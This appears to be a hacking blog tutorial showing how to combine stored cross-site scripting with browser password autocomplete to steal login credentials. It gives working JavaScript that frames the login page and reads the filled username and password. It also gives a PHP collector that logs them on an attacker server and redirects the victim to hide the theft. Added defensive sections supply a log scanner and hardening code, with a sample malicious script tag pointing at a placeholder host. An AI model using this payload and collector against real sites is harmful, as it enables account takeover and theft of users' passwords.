Stealing passwords with autocomplete and XSS

Hi again. This time we have a new way to combine Cross Site Scripting and autocomplete vulnerabilities. Yes, my young padawans, autocomplete is a vulnerability, one that scanners mark as low severity; we need to pay attention to all of our vulnerabilities, not only the high-rated ones.

Here we go again. This web application is a public one from the internet that is meant for testing, so we won't have any problem with the FBI or the police and we can do whatever we want.

First we need the autocomplete function; this can be found when you log in to a web application.

[Screenshot: autocomplete]

Next, if your application is like mine (as happens so many times), there is a cross site scripting vulnerability; in this case we have a good one, a stored cross site scripting.

[Screenshot: XSS_2]

So we need to write a piece of JavaScript that loads the login form on the fly (inside a frame), and then a script that reads the data from that form and sends it to our server.


// Create a frameset with one frame that loads the login page; the browser
// autocompletes the saved credentials into that form.
var frameset = document.createElement('frameset');
var frame1 = document.createElement('frame');
document.body.appendChild(frameset);
frame1.setAttribute('src', 'login.php');
frameset.appendChild(frame1);

// Give the frame a second to load (and be autocompleted) before reading it.
setTimeout(showLogin, 1000);

function showLogin()
{
    // Read the first two fields of the first form inside the frame.
    var user = parent.frames[0].document.forms[0].elements[0].value;
    var pass = parent.frames[0].document.forms[0].elements[1].value;
    var data = 'user:' + user + ' ' + 'pass:' + pass;
    location.href = "yourphpscript.php?x=" + data;
}

We also need a PHP script; this script receives our data and saves it in a file.


<?php
// Take the data from the query string and append it to a text file.
$data = $_GET['x'];
$all = "\n" . $data . "\n" . "******************";
$file = "data.txt";
$fp = fopen($file, "a") or die("Couldn't open $file for login!");
fwrite($fp, $all) or die("Couldn't open new page!");
fclose($fp);
// Send the browser somewhere else so nothing looks out of place.
header('Location: otherpage');
?>
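The receiving script above gets the credentials in the URL's query string, which means they also land in every web-server access log, proxy log and browser history along the way. As an added example that is not part of the original post, here is a small Node.js scanner a defender could run over proxy or access logs to flag requests whose query string carries credential-looking keys, including the `user:… pass:…` token format the script above expects. The log lines are constructed for the demo, and the key list in `CREDENTIAL_KEYS` is an assumption to adjust for the application.

```javascript
// Added detection example (Node.js, no dependencies); not code from the original post.
// SAMPLE_LOG lines are constructed for the demo; CREDENTIAL_KEYS is an assumption.

const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512',
  '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /collect.php?x=user:alice%20pass:Winter2023 HTTP/1.1" 302 0',
  '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /search.php?q=password+reset HTTP/1.1" 200 2048',
  '198.51.100.9 - - [10/Oct/2023:13:56:05 +0000] "POST /login.php HTTP/1.1" 200 1024',
];

// Keys that should never travel in a URL. Matched against proper query-string
// parameter names and against the "key:value" tokens the post's script builds.
const CREDENTIAL_KEYS = /^(pass(word|wd)?|pwd|secret|token)$/i;

// Pull method and request target out of a Common/Combined Log Format line.
function parseRequest(line) {
  const m = line.match(/"([A-Z]+) (\S+) HTTP\/[\d.]+"/);
  return m ? { method: m[1], target: m[2] } : null;
}

// Percent-decode a query component without throwing on malformed input.
function safeDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch (e) { return s; }
}

// Collect candidate keys: each parameter name, plus the part before ':' of every
// whitespace-separated token inside a parameter value (handles "x=user:a pass:b").
function extractKeys(query) {
  const keys = [];
  for (const pair of query.split('&')) {
    const eq = pair.indexOf('=');
    const key = safeDecode(eq < 0 ? pair : pair.slice(0, eq));
    const value = eq < 0 ? '' : safeDecode(pair.slice(eq + 1));
    keys.push(key);
    for (const token of value.split(/\s+/)) {
      const colon = token.indexOf(':');
      if (colon > 0) keys.push(token.slice(0, colon));
    }
  }
  return keys;
}

// One finding per log line whose query string carries a credential-like key.
// The secret values themselves are deliberately not copied into the finding.
function findCredentialLeaks(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseRequest(line);
    if (!req) continue;
    const q = req.target.indexOf('?');
    if (q < 0) continue;
    const hits = extractKeys(req.target.slice(q + 1)).filter((k) => CREDENTIAL_KEYS.test(k));
    if (hits.length) findings.push({ path: req.target.slice(0, q), keys: hits });
  }
  return findings;
}

for (const f of findCredentialLeaks(SAMPLE_LOG)) {
  console.log('credential-like key(s) in query string: ' + f.path + ' -> ' + f.keys.join(', '));
}
```

Run over the sample it reports only the `/collect.php` request; the search for "password reset" and the POST to `login.php` are not flagged because neither carries a credential key in its query string. Matching on keys rather than values keeps the secrets out of the alert itself.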

Well, maybe you're asking about the action at this point: we just need to click and send our payload to the victim's application.

[Screenshot: XSS_3]

[Screenshot: XSS_4]

Then we check the txt file on our hacking server, and…

[Screenshot: txt_file]

So maybe you think the main vulnerability is the XSS. Well, you're wrong: the main one is autocomplete, because that little feature has no idea about security the way we do, so it fills in the information without asking us.
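The post's point is that the browser hands the saved credentials to whatever script runs on the page. As an added example that is not part of the original post, here is the defender's side in Node.js: output-encoding stored content so the injected script never runs, a login form whose credential fields opt out of autocomplete, and a Content-Security-Policy that disallows inline scripts and framing. The function names, the comment markup, the `attacker.example` host and the policy values are assumptions for illustration, not anything taken from the application in the screenshots.

```javascript
// Added hardening example (Node.js, no dependencies); not code from the original post.
// renderComment, loginFormHtml and cspHeader are assumed names for illustration.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// 1. Output-encode stored user content at render time, so a stored
//    <script> payload is displayed as text instead of being executed.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Renders one stored comment into markup; the stored value is data, never markup.
function renderComment(comment) {
  return '<li class="comment">' + escapeHtml(comment) + '</li>';
}

// 2. Login form whose credential fields opt out of autocomplete. Caveat: Chrome
//    and Firefox ignore this on login fields once the user has saved a password,
//    so it only stops the browser's plain form-history suggestions.
function loginFormHtml() {
  return [
    '<form method="post" action="login.php" autocomplete="off">',
    '  <input type="text" name="user" autocomplete="off">',
    '  <input type="password" name="pass" autocomplete="off">',
    '  <button type="submit">Login</button>',
    '</form>',
  ].join('\n');
}

// 3. Content-Security-Policy: no 'unsafe-inline', so an injected inline <script>
//    does not run; form-action limits where forms may submit; frame-src 'none'
//    keeps the page from loading login.php into a frame (assumes the application
//    does not use frames itself).
function cspHeader() {
  return [
    "default-src 'self'",
    "script-src 'self'",
    "form-action 'self'",
    "frame-src 'none'",
    "frame-ancestors 'self'",
  ].join('; ');
}

// Demo with a constructed stored comment of the kind the post injects
// (attacker.example is a placeholder host, not a real one).
const storedComment = '<script src="http://attacker.example/x.js"></script>';
console.log(renderComment(storedComment));
console.log(loginFormHtml());
console.log('Content-Security-Policy: ' + cspHeader());
```

The encoding step is the real fix: once the stored payload cannot run, there is no script to read the autocompleted form. The autocomplete attribute is a second layer with a known limit, since password managers and current browsers largely ignore it for login fields, and the CSP is the backstop that stops an inline script even if an encoding gap slips through somewhere else.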

Just remember, easiness comes with insecurity.


Thanks to shellhellboy@gmail.com for his Apache server.
